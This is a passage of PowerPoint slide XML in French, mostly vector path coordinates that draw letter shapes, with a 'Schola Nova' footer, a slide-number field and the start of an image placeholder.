                <a:gd name="connsiteY2" fmla="*/ 434721 h 434721"/>
                <a:gd name="connsiteX3" fmla="*/ 227838 w 367474"/>
                <a:gd name="connsiteY3" fmla="*/ 434721 h 434721"/>
                <a:gd name="connsiteX4" fmla="*/ 227838 w 367474"/>
                <a:gd name="connsiteY4" fmla="*/ 80391 h 434721"/>
                <a:gd name="connsiteX5" fmla="*/ 367475 w 367474"/>
                <a:gd name="connsiteY5" fmla="*/ 80391 h 434721"/>
                <a:gd name="connsiteX6" fmla="*/ 367475 w 367474"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 434721"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 367474"/>
                <a:gd name="connsiteY7" fmla="*/ 0 h 434721"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 367474"/>
                <a:gd name="connsiteY8" fmla="*/ 80391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474" h="434721">
                  <a:moveTo>
                    <a:pt x="0" y="80391"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="138970" y="80391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138970" y="434721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227838" y="434721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227838" y="80391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367475" y="80391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367475" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="80391"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:grp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B8B9B0B9-DA14-4772-95E2-1AE9AFBCD8E8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6324599" y="3213067"/>
              <a:ext cx="300323" cy="434721"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 88963 w 300323"/>
                <a:gd name="connsiteY0" fmla="*/ 244316 h 434721"/>
                <a:gd name="connsiteX1" fmla="*/ 239078 w 300323"/>
                <a:gd name="connsiteY1" fmla="*/ 244316 h 434721"/>
                <a:gd name="connsiteX2" fmla="*/ 239078 w 300323"/>
                <a:gd name="connsiteY2" fmla="*/ 168593 h 434721"/>
                <a:gd name="connsiteX3" fmla="*/ 88963 w 300323"/>
                <a:gd name="connsiteY3" fmla="*/ 168593 h 434721"/>
                <a:gd name="connsiteX4" fmla="*/ 88963 w 300323"/>
                <a:gd name="connsiteY4" fmla="*/ 80391 h 434721"/>
                <a:gd name="connsiteX5" fmla="*/ 292418 w 300323"/>
                <a:gd name="connsiteY5" fmla="*/ 80391 h 434721"/>
                <a:gd name="connsiteX6" fmla="*/ 292418 w 300323"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 434721"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 300323"/>
                <a:gd name="connsiteY7" fmla="*/ 0 h 434721"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 300323"/>
                <a:gd name="connsiteY8" fmla="*/ 434721 h 434721"/>
                <a:gd name="connsiteX9" fmla="*/ 300323 w 300323"/>
                <a:gd name="connsiteY9" fmla="*/ 434721 h 434721"/>
                <a:gd name="connsiteX10" fmla="*/ 300323 w 300323"/>
                <a:gd name="connsiteY10" fmla="*/ 354330 h 434721"/>
                <a:gd name="connsiteX11" fmla="*/ 88963 w 300323"/>
                <a:gd name="connsiteY11" fmla="*/ 354330 h 434721"/>
                <a:gd name="connsiteX12" fmla="*/ 88963 w 300323"/>
                <a:gd name="connsiteY12" fmla="*/ 244316 h 43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0323" h="434721">
                  <a:moveTo>
                    <a:pt x="88963" y="244316"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="239078" y="244316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239078" y="168593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88963" y="168593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88963" y="80391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292418" y="80391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292418" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="434721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300323" y="434721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300323" y="354330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88963" y="354330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88963" y="244316"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:grp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6C0BB560-2E5D-47AE-9EAD-AD78BB26B518}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6789514" y="3205162"/>
              <a:ext cx="426053" cy="442626"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 212693 w 426053"/>
                <a:gd name="connsiteY0" fmla="*/ 235839 h 442626"/>
                <a:gd name="connsiteX1" fmla="*/ 29623 w 426053"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 442626"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 426053"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 442626"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 426053"/>
                <a:gd name="connsiteY3" fmla="*/ 442627 h 442626"/>
                <a:gd name="connsiteX4" fmla="*/ 88868 w 426053"/>
                <a:gd name="connsiteY4" fmla="*/ 442627 h 442626"/>
                <a:gd name="connsiteX5" fmla="*/ 88868 w 426053"/>
                <a:gd name="connsiteY5" fmla="*/ 210122 h 442626"/>
                <a:gd name="connsiteX6" fmla="*/ 198215 w 426053"/>
                <a:gd name="connsiteY6" fmla="*/ 347758 h 442626"/>
                <a:gd name="connsiteX7" fmla="*/ 227171 w 426053"/>
                <a:gd name="connsiteY7" fmla="*/ 347758 h 442626"/>
                <a:gd name="connsiteX8" fmla="*/ 337185 w 426053"/>
                <a:gd name="connsiteY8" fmla="*/ 210122 h 442626"/>
                <a:gd name="connsiteX9" fmla="*/ 337185 w 426053"/>
                <a:gd name="connsiteY9" fmla="*/ 442627 h 442626"/>
                <a:gd name="connsiteX10" fmla="*/ 426053 w 426053"/>
                <a:gd name="connsiteY10" fmla="*/ 442627 h 442626"/>
                <a:gd name="connsiteX11" fmla="*/ 426053 w 426053"/>
                <a:gd name="connsiteY11" fmla="*/ 0 h 442626"/>
                <a:gd name="connsiteX12" fmla="*/ 397097 w 426053"/>
                <a:gd name="connsiteY12" fmla="*/ 0 h 442626"/>
                <a:gd name="connsiteX13" fmla="*/ 212693 w 426053"/>
                <a:gd name="connsiteY13" fmla="*/ 235839 h 442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6053" h="442626">
                  <a:moveTo>
                    <a:pt x="212693" y="235839"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="29623" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="442627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88868" y="442627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88868" y="210122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198215" y="347758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227171" y="347758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337185" y="210122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337185" y="442627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426053" y="442627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426053" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397097" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212693" y="235839"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:grp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375B55FE-0DB6-4429-8EF5-8D0C7ECDDE37}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7391018" y="3213139"/>
              <a:ext cx="319788" cy="434553"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 308470 w 319788"/>
                <a:gd name="connsiteY0" fmla="*/ 82560 h 434553"/>
                <a:gd name="connsiteX1" fmla="*/ 276275 w 319788"/>
                <a:gd name="connsiteY1" fmla="*/ 38078 h 434553"/>
                <a:gd name="connsiteX2" fmla="*/ 226840 w 319788"/>
                <a:gd name="connsiteY2" fmla="*/ 9503 h 434553"/>
                <a:gd name="connsiteX3" fmla="*/ 163975 w 319788"/>
                <a:gd name="connsiteY3" fmla="*/ -22 h 434553"/>
                <a:gd name="connsiteX4" fmla="*/ -45 w 319788"/>
                <a:gd name="connsiteY4" fmla="*/ -22 h 434553"/>
                <a:gd name="connsiteX5" fmla="*/ -45 w 319788"/>
                <a:gd name="connsiteY5" fmla="*/ 434509 h 434553"/>
                <a:gd name="connsiteX6" fmla="*/ 88823 w 319788"/>
                <a:gd name="connsiteY6" fmla="*/ 434509 h 434553"/>
                <a:gd name="connsiteX7" fmla="*/ 88823 w 319788"/>
                <a:gd name="connsiteY7" fmla="*/ 281061 h 434553"/>
                <a:gd name="connsiteX8" fmla="*/ 163689 w 319788"/>
                <a:gd name="connsiteY8" fmla="*/ 281061 h 434553"/>
                <a:gd name="connsiteX9" fmla="*/ 226554 w 319788"/>
                <a:gd name="connsiteY9" fmla="*/ 270869 h 434553"/>
                <a:gd name="connsiteX10" fmla="*/ 275989 w 319788"/>
                <a:gd name="connsiteY10" fmla="*/ 242294 h 434553"/>
                <a:gd name="connsiteX11" fmla="*/ 308184 w 319788"/>
                <a:gd name="connsiteY11" fmla="*/ 197813 h 434553"/>
                <a:gd name="connsiteX12" fmla="*/ 319709 w 319788"/>
                <a:gd name="connsiteY12" fmla="*/ 140663 h 434553"/>
                <a:gd name="connsiteX13" fmla="*/ 308470 w 319788"/>
                <a:gd name="connsiteY13" fmla="*/ 82560 h 434553"/>
                <a:gd name="connsiteX14" fmla="*/ 211981 w 319788"/>
                <a:gd name="connsiteY14" fmla="*/ 185906 h 434553"/>
                <a:gd name="connsiteX15" fmla="*/ 163689 w 319788"/>
                <a:gd name="connsiteY15" fmla="*/ 203337 h 434553"/>
                <a:gd name="connsiteX16" fmla="*/ 89204 w 319788"/>
                <a:gd name="connsiteY16" fmla="*/ 203337 h 434553"/>
                <a:gd name="connsiteX17" fmla="*/ 89204 w 319788"/>
                <a:gd name="connsiteY17" fmla="*/ 78274 h 434553"/>
                <a:gd name="connsiteX18" fmla="*/ 163689 w 319788"/>
                <a:gd name="connsiteY18" fmla="*/ 78274 h 434553"/>
                <a:gd name="connsiteX19" fmla="*/ 212362 w 319788"/>
                <a:gd name="connsiteY19" fmla="*/ 95324 h 434553"/>
                <a:gd name="connsiteX20" fmla="*/ 229507 w 319788"/>
                <a:gd name="connsiteY20" fmla="*/ 140186 h 434553"/>
                <a:gd name="connsiteX21" fmla="*/ 211981 w 319788"/>
                <a:gd name="connsiteY21" fmla="*/ 185906 h 434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9788" h="434553">
                  <a:moveTo>
                    <a:pt x="308470" y="82560"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="301116" y="65557"/>
                    <a:pt x="290134" y="50373"/>
                    <a:pt x="276275" y="38078"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="261844" y="25381"/>
                    <a:pt x="245042" y="15669"/>
                    <a:pt x="226840" y="9503"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206562" y="2865"/>
                    <a:pt x="185311" y="-353"/>
                    <a:pt x="163975" y="-22"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="-45" y="-22"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="-45" y="434509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="434509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="281061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163689" y="281061"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="185073" y="281320"/>
                    <a:pt x="206342" y="277872"/>
                    <a:pt x="226554" y="270869"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="244747" y="264677"/>
                    <a:pt x="261540" y="254967"/>
                    <a:pt x="275989" y="242294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="289743" y="229907"/>
                    <a:pt x="300716" y="214747"/>
                    <a:pt x="308184" y="197813"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="316061" y="179803"/>
                    <a:pt x="319985" y="160317"/>
                    <a:pt x="319709" y="140663"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320147" y="120715"/>
                    <a:pt x="316318" y="100905"/>
                    <a:pt x="308470" y="82560"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="211981" y="185906"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="198951" y="198081"/>
                    <a:pt x="181492" y="204382"/>
                    <a:pt x="163689" y="203337"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="89204" y="203337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89204" y="78274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163689" y="78274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="181549" y="77133"/>
                    <a:pt x="199113" y="83285"/>
                    <a:pt x="212362" y="95324"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224002" y="107283"/>
                    <a:pt x="230203" y="123511"/>
                    <a:pt x="229507" y="140186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230136" y="157178"/>
                    <a:pt x="223811" y="173692"/>
                    <a:pt x="211981" y="185906"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:grpFill/>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fr-FR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Forme libre : forme 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9634ABA6-0BBC-41CE-BA1C-F5E9A35613EB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7796116" y="3205474"/>
              <a:ext cx="320413" cy="450200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 291991 w 320413"/>
                <a:gd name="connsiteY0" fmla="*/ 244245 h 450200"/>
                <a:gd name="connsiteX1" fmla="*/ 212648 w 320413"/>
                <a:gd name="connsiteY1" fmla="*/ 192620 h 450200"/>
                <a:gd name="connsiteX2" fmla="*/ 163213 w 320413"/>
                <a:gd name="connsiteY2" fmla="*/ 170807 h 450200"/>
                <a:gd name="connsiteX3" fmla="*/ 125685 w 320413"/>
                <a:gd name="connsiteY3" fmla="*/ 149757 h 450200"/>
                <a:gd name="connsiteX4" fmla="*/ 112540 w 320413"/>
                <a:gd name="connsiteY4" fmla="*/ 121182 h 450200"/>
                <a:gd name="connsiteX5" fmla="*/ 128352 w 320413"/>
                <a:gd name="connsiteY5" fmla="*/ 89273 h 450200"/>
                <a:gd name="connsiteX6" fmla="*/ 166452 w 320413"/>
                <a:gd name="connsiteY6" fmla="*/ 78986 h 450200"/>
                <a:gd name="connsiteX7" fmla="*/ 213505 w 320413"/>
                <a:gd name="connsiteY7" fmla="*/ 92226 h 450200"/>
                <a:gd name="connsiteX8" fmla="*/ 249414 w 320413"/>
                <a:gd name="connsiteY8" fmla="*/ 129088 h 450200"/>
                <a:gd name="connsiteX9" fmla="*/ 309994 w 320413"/>
                <a:gd name="connsiteY9" fmla="*/ 82320 h 450200"/>
                <a:gd name="connsiteX10" fmla="*/ 254367 w 320413"/>
                <a:gd name="connsiteY10" fmla="*/ 23360 h 450200"/>
                <a:gd name="connsiteX11" fmla="*/ 165785 w 320413"/>
                <a:gd name="connsiteY11" fmla="*/ 24 h 450200"/>
                <a:gd name="connsiteX12" fmla="*/ 109111 w 320413"/>
                <a:gd name="connsiteY12" fmla="*/ 8501 h 450200"/>
                <a:gd name="connsiteX13" fmla="*/ 63391 w 320413"/>
                <a:gd name="connsiteY13" fmla="*/ 32885 h 450200"/>
                <a:gd name="connsiteX14" fmla="*/ 33102 w 320413"/>
                <a:gd name="connsiteY14" fmla="*/ 71747 h 450200"/>
                <a:gd name="connsiteX15" fmla="*/ 21957 w 320413"/>
                <a:gd name="connsiteY15" fmla="*/ 122801 h 450200"/>
                <a:gd name="connsiteX16" fmla="*/ 29863 w 320413"/>
                <a:gd name="connsiteY16" fmla="*/ 164235 h 450200"/>
                <a:gd name="connsiteX17" fmla="*/ 51580 w 320413"/>
                <a:gd name="connsiteY17" fmla="*/ 197858 h 450200"/>
                <a:gd name="connsiteX18" fmla="*/ 84822 w 320413"/>
                <a:gd name="connsiteY18" fmla="*/ 225195 h 450200"/>
                <a:gd name="connsiteX19" fmla="*/ 127304 w 320413"/>
                <a:gd name="connsiteY19" fmla="*/ 247960 h 450200"/>
                <a:gd name="connsiteX20" fmla="*/ 173405 w 320413"/>
                <a:gd name="connsiteY20" fmla="*/ 269010 h 450200"/>
                <a:gd name="connsiteX21" fmla="*/ 214267 w 320413"/>
                <a:gd name="connsiteY21" fmla="*/ 291394 h 450200"/>
                <a:gd name="connsiteX22" fmla="*/ 228745 w 320413"/>
                <a:gd name="connsiteY22" fmla="*/ 323017 h 450200"/>
                <a:gd name="connsiteX23" fmla="*/ 212553 w 320413"/>
                <a:gd name="connsiteY23" fmla="*/ 358545 h 450200"/>
                <a:gd name="connsiteX24" fmla="*/ 168166 w 320413"/>
                <a:gd name="connsiteY24" fmla="*/ 371118 h 450200"/>
                <a:gd name="connsiteX25" fmla="*/ 103968 w 320413"/>
                <a:gd name="connsiteY25" fmla="*/ 352068 h 450200"/>
                <a:gd name="connsiteX26" fmla="*/ 80536 w 320413"/>
                <a:gd name="connsiteY26" fmla="*/ 331970 h 450200"/>
                <a:gd name="connsiteX27" fmla="*/ 61486 w 320413"/>
                <a:gd name="connsiteY27" fmla="*/ 308253 h 450200"/>
                <a:gd name="connsiteX28" fmla="*/ -45 w 320413"/>
                <a:gd name="connsiteY28" fmla="*/ 353878 h 450200"/>
                <a:gd name="connsiteX29" fmla="*/ 168166 w 320413"/>
                <a:gd name="connsiteY29" fmla="*/ 450080 h 450200"/>
                <a:gd name="connsiteX30" fmla="*/ 228079 w 320413"/>
                <a:gd name="connsiteY30" fmla="*/ 441222 h 450200"/>
                <a:gd name="connsiteX31" fmla="*/ 276180 w 320413"/>
                <a:gd name="connsiteY31" fmla="*/ 415505 h 450200"/>
                <a:gd name="connsiteX32" fmla="*/ 308470 w 320413"/>
                <a:gd name="connsiteY32" fmla="*/ 374357 h 450200"/>
                <a:gd name="connsiteX33" fmla="*/ 320280 w 320413"/>
                <a:gd name="connsiteY33" fmla="*/ 319683 h 450200"/>
                <a:gd name="connsiteX34" fmla="*/ 291991 w 320413"/>
                <a:gd name="connsiteY34" fmla="*/ 244245 h 45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20413" h="450200">
                  <a:moveTo>
                    <a:pt x="291991" y="244245"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="268969" y="222276"/>
                    <a:pt x="242061" y="204771"/>
                    <a:pt x="212648" y="192620"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="163213" y="170807"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="150021" y="165086"/>
                    <a:pt x="137448" y="158033"/>
                    <a:pt x="125685" y="149757"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116884" y="142963"/>
                    <a:pt x="111969" y="132286"/>
                    <a:pt x="112540" y="121182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111635" y="108465"/>
                    <a:pt x="117684" y="96255"/>
                    <a:pt x="128352" y="89273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139763" y="82180"/>
                    <a:pt x="153021" y="78603"/>
                    <a:pt x="166452" y="78986"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183101" y="78626"/>
                    <a:pt x="199484" y="83236"/>
                    <a:pt x="213505" y="92226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227869" y="101926"/>
                    <a:pt x="240099" y="114472"/>
                    <a:pt x="249414" y="129088"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="309994" y="82320"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="296887" y="58168"/>
                    <a:pt x="277713" y="37846"/>
                    <a:pt x="254367" y="23360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227697" y="7217"/>
                    <a:pt x="196941" y="-885"/>
                    <a:pt x="165785" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146573" y="-105"/>
                    <a:pt x="127447" y="2755"/>
                    <a:pt x="109111" y="8501"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92433" y="13580"/>
                    <a:pt x="76898" y="21863"/>
                    <a:pt x="63391" y="32885"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50685" y="43576"/>
                    <a:pt x="40369" y="56816"/>
                    <a:pt x="33102" y="71747"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25491" y="87677"/>
                    <a:pt x="21681" y="105152"/>
                    <a:pt x="21957" y="122801"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21710" y="137010"/>
                    <a:pt x="24396" y="151116"/>
                    <a:pt x="29863" y="164235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35140" y="176596"/>
                    <a:pt x="42484" y="187967"/>
                    <a:pt x="51580" y="197858"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61372" y="208437"/>
                    <a:pt x="72554" y="217634"/>
                    <a:pt x="84822" y="225195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98481" y="233679"/>
                    <a:pt x="112674" y="241283"/>
                    <a:pt x="127304" y="247960"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173405" y="269010"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="187721" y="275118"/>
                    <a:pt x="201408" y="282615"/>
                    <a:pt x="214267" y="291394"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224106" y="298830"/>
                    <a:pt x="229545" y="310713"/>
                    <a:pt x="228745" y="323017"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229469" y="336792"/>
                    <a:pt x="223421" y="350052"/>
                    <a:pt x="212553" y="358545"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199551" y="367517"/>
                    <a:pt x="183940" y="371937"/>
                    <a:pt x="168166" y="371118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145306" y="371594"/>
                    <a:pt x="122865" y="364935"/>
                    <a:pt x="103968" y="352068"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="95500" y="346174"/>
                    <a:pt x="87651" y="339441"/>
                    <a:pt x="80536" y="331970"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73573" y="324575"/>
                    <a:pt x="67201" y="316645"/>
                    <a:pt x="61486" y="308253"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="-45" y="353878"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="33578" y="414924"/>
                    <a:pt x="98500" y="452054"/>
                    <a:pt x="168166" y="450080"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188473" y="450259"/>
                    <a:pt x="208686" y="447270"/>
                    <a:pt x="228079" y="441222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245614" y="435818"/>
                    <a:pt x="261949" y="427087"/>
                    <a:pt x="276180" y="415505"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="289829" y="404323"/>
                    <a:pt x="300859" y="390275"/>
                    <a:pt x="308470" y="374357"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="316499" y="357264"/>
                    <a:pt x="320538" y="338567"/>
                    <a:pt x="320280" y="319683"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321433" y="291747"/>
                    <a:pt x="311232" y="264534"/>
                    <a:pt x="291991" y="244245"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:grpFill/>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fr-FR"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé du pied de page 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2E2DEB0-9943-41BE-A858-A938EF8C9C2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7616067" y="6360880"/>
            <a:ext cx="4114800" cy="288147"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>Schola </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Nova </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27670C00-19F2-4FE2-AD1D-8506B0415EF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40" name="Espace réservé pour une image  39" descr="Une image contenant texte, personne, ordinateur, ordinateur portable&#10;&#10;Le contenu généré par l’IA peut être incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56B87010-F455-0C7E-570C-FEE10E02CA7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
